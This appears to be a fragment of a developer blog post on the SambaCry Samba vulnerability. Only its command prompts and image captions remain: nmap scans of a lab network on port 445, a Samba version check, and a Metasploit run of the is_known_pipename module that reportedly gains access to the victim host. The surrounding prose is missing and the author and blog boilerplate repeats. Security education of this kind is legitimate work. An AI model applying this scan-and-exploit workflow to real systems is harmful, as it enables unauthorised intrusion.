SambaCry — old protocol, new threat

Wojciech W
Oct 12, 2018 · 5 min read
root@kali-vm:~# nmap 10.0.0.* -p 445
Results of nmap scan for network 10.0.0.* and port 445
root@kali-vm:~# nmap -A 10.0.0.102
Results of nmap scan for host 10.0.0.102
user1@sambaCryServer:~$ ifconfig
IP configuration on host with Samba server active
user1@sambaCryServer:~$ smbd -V
Version of Samba on the host
msf exploit(linux/samba/is_known_pipename) > show options
Metasploit configuration
msf exploit(linux/samba/is_known_pipename) > exploit
Result of exploitation with basic command ran to verify access to victim host

intive Developers

At intive we’re building great digital products for our customers. Day by day. We want to share with you our way of doing things, the challenges we face, the tricks and shortcuts we discover. A little peek behind the scenes — welcome to our intive_dev blog!

Thanks to Jaroslaw Porzucek.

Wojciech W

Written by

intive Developers

At intive we’re building great digital products for our customers. Day by day. We want to share with you our way of doing things, the challenges we face, the tricks and shortcuts we discover. A little peek behind the scenes — welcome to our intive_dev blog!